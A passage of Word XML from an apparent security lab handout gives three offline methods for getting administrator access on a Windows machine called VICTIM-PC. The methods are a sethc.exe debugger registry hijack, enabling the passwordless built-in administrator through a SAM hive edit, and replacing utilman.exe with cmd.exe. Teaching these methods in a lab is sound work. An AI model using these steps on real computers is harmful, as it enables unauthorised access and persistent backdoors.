    </w:p>
    <w:p w14:paraId="2F71949D" w14:textId="77777777" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B"/>
    <w:p w14:paraId="6DA11948" w14:textId="2D944CAC" w:rsidR="004E24E8" w:rsidRDefault="004E24E8" w:rsidP="00416A9B">
      <w:r>
        <w:t xml:space="preserve">Launch regedit from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B3805">
        <w:t>, an</w:t>
      </w:r>
      <w:r w:rsidR="00912D81">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="004B3805">
        <w:t xml:space="preserve"> then use the three methods</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableauGrille4-Accentuation4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00416A9B" w14:paraId="33839699" w14:textId="77777777" w:rsidTr="0041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9E50F2B" w14:textId="648FF5EF" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B">
            <w:r>
              <w:t>NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00416A9B" w14:paraId="499827B0" w14:textId="77777777" w:rsidTr="0041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5BAAB81" w14:textId="77777777" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B">
            <w:r>
              <w:t>For task 4 you must have implemented either method 1 or method 2.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A354B57" w14:textId="37ACF868" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B">
            <w:r>
              <w:t>You can test de three methods in this lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="715B310C" w14:textId="77777777" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B"/>
    <w:p w14:paraId="131CB2E9" w14:textId="77777777" w:rsidR="004B3805" w:rsidRPr="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F68BCAC" w14:textId="3969AC55" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="00DA573F">
      <w:pPr>
        <w:pStyle w:val="Titre6"/>
      </w:pPr>
      <w:r w:rsidRPr="004B3805">
        <w:t>Method 1: configure sethc.exe to start cmd.exe through the registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604FF77" w14:textId="77777777" w:rsidR="00DA573F" w:rsidRPr="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00DA573F"/>
    <w:p w14:paraId="75BE1696" w14:textId="77777777" w:rsidR="0094064A" w:rsidRDefault="0094064A" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>regedit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC50462" w14:textId="2D4D6F40" w:rsidR="004E24E8" w:rsidRDefault="004E24E8" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>While regedit</w:t>
      </w:r>
      <w:r w:rsidR="0094064A">
        <w:t>, select HKEY_LOCAL_MACHINE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0094064A">
        <w:t xml:space="preserve">key then from </w:t>
      </w:r>
      <w:r w:rsidR="0094064A" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidR="0094064A">
        <w:t xml:space="preserve"> menu, select </w:t>
      </w:r>
      <w:r w:rsidR="0094064A" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Load Hive</w:t>
      </w:r>
      <w:r w:rsidR="0094064A">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">load </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SOFTWARE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hive </w:t>
      </w:r>
      <w:r w:rsidR="0094064A">
        <w:t xml:space="preserve">stored in </w:t>
      </w:r>
      <w:r w:rsidR="0094064A" w:rsidRPr="000C78BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\Windows\System32\Config</w:t>
      </w:r>
      <w:r w:rsidR="0094064A" w:rsidRPr="00C6425D">
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
      <w:r w:rsidR="0094064A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>on the VICTIM-PC machine</w:t>
      </w:r>
      <w:r w:rsidR="00FA17ED">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and name it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SoftKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65123C04" w14:textId="3B6C1BB8" w:rsidR="004E24E8" w:rsidRDefault="004E24E8" w:rsidP="004E24E8">
      <w:r w:rsidRPr="004E24E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7041D4" wp14:editId="169A2FA5">
            <wp:extent cx="5207268" cy="2781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268" cy="2781443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="047BC87B" w14:textId="2D6FBBE4" w:rsidR="004E24E8" w:rsidRDefault="004E24E8" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Brows</w:t>
      </w:r>
      <w:r w:rsidR="00BA3EED">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> loaded SOFTWARE Key (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C6667">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SoftKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) and locate </w:t>
      </w:r>
      <w:r w:rsidRPr="000C6667">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/Microsoft/Windows NT/CurrentVersion/Image File Execution Options</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1482108C" w14:textId="06328646" w:rsidR="00BA3EED" w:rsidRDefault="00BA3EED" w:rsidP="008A5CFA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create new key named </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3EED">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sethc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A9A78" w14:textId="4FF6CEFD" w:rsidR="004E24E8" w:rsidRDefault="00BA3EED" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In sethc.exe key create new REG_SZ value named </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3EED">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and set the key data to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3EED">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDC07EA" w14:textId="28DBEF02" w:rsidR="00BA3EED" w:rsidRDefault="00BA3EED" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unload the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SoftKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hive (through </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="00FA17ED">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00FA17ED" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>unload hive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> menu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7840B9C0" w14:textId="1FE583A1" w:rsidR="00BA3EED" w:rsidRDefault="00BA3EED" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Shutdown the VICTIM-PC machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C7E79" w14:textId="2058EDBC" w:rsidR="00BA3EED" w:rsidRDefault="00BA3EED" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disconnect the media and boot normally the VICTIM-PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F73FF" w14:textId="33BB98A6" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805"/>
    <w:p w14:paraId="3EDBE0C3" w14:textId="6D38F2A2" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="00DA573F">
      <w:pPr>
        <w:pStyle w:val="Titre6"/>
      </w:pPr>
      <w:r w:rsidRPr="004B3805">
        <w:t>Method 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: enable the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>built</w:t>
      </w:r>
      <w:r w:rsidR="00DA573F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrator account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC11050" w14:textId="77777777" w:rsidR="00DA573F" w:rsidRPr="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00DA573F"/>
    <w:p w14:paraId="6E7E133A" w14:textId="77777777" w:rsidR="00FA17ED" w:rsidRDefault="00FA17ED" w:rsidP="00FA17ED">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>regedit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE46C08" w14:textId="459D60D4" w:rsidR="00FA17ED" w:rsidRDefault="00FA17ED" w:rsidP="00FA17ED">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">While regedit, select HKEY_LOCAL_MACHINE key then from </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> menu, select </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Load Hive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to load </w:t>
      </w:r>
      <w:r w:rsidRPr="004D193D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hive stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="000C78BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\Windows\System32\Config</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, on the VICTIM-PC machine, and name it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D193D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SamKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669D4F8" w14:textId="77777777" w:rsidR="00FA17ED" w:rsidRDefault="00FA17ED" w:rsidP="00FA17ED">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browse to key </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F73FCA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SamKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F73FCA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\SAM\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Domains\</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73FCA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Account\Users\000001F4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73FCA">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73FCA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F73FCA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value (REG_DWORD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32231723" w14:textId="77777777" w:rsidR="00FA17ED" w:rsidRPr="00014BAB" w:rsidRDefault="00FA17ED" w:rsidP="00FA17ED">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Edit </w:t>
      </w:r>
      <w:r w:rsidRPr="00F73FCA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value and modify byte </w:t>
      </w:r>
      <w:r w:rsidRPr="00F73FCA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: replace </w:t>
      </w:r>
      <w:r w:rsidRPr="00F73FCA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (disable) with </w:t>
      </w:r>
      <w:r w:rsidRPr="00F73FCA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (enable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045AB908" w14:textId="28F3A051" w:rsidR="00DA573F" w:rsidRDefault="00FA17ED" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
      <w:r w:rsidRPr="00F53EC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55E7D75A" wp14:editId="3A3D7B93">
            <wp:extent cx="3905451" cy="20829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451" cy="2082907"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7683A" w14:textId="77777777" w:rsidR="00FA17ED" w:rsidRDefault="00DA573F" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unload the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SamKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hive (through </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="00FA17ED">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00FA17ED" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>unload hive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> menu)</w:t>
      </w:r>
      <w:r w:rsidR="00FA17ED" w:rsidRPr="00FA17ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D1917D" w14:textId="164A9E37" w:rsidR="00DA573F" w:rsidRDefault="00FA17ED" w:rsidP="00C6425D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="008802D8">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>no password set on this disabled account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C729D4" w14:textId="4E990D13" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Shutdown the VICTIM-PC machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C4D14" w14:textId="38C8F0CC" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disconnect the media and boot normally the VICTIM-PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06738481" w14:textId="6BB731BE" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00F53EC5"/>
    <w:p w14:paraId="6CE21A80" w14:textId="5F8521EE" w:rsidR="00DA573F" w:rsidRPr="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00DA573F">
      <w:pPr>
        <w:pStyle w:val="Titre6"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA573F">
        <w:t>Method 3: replace utilman.exe with cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1173A066" w14:textId="50C0EBBD" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00F53EC5"/>
    <w:p w14:paraId="14209D56" w14:textId="35F83BD0" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA17ED">
        <w:t xml:space="preserve"> you open,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> run the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEA12C" w14:textId="2C964BF1" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00DA573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C2587" w14:textId="2186D413" w:rsidR="00DA573F" w:rsidRPr="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00DA573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run "</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cd c:\windows\system32</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D88E5A" w14:textId="77777777" w:rsidR="00DA573F" w:rsidRPr="00D8019B" w:rsidRDefault="00DA573F" w:rsidP="00DA573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8019B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8019B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ren utilman.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8019B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>utilman.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8019B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D9D228" w14:textId="07CA2906" w:rsidR="00DA573F" w:rsidRPr="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00DA573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run "</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>copy cmd.exe utilman.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
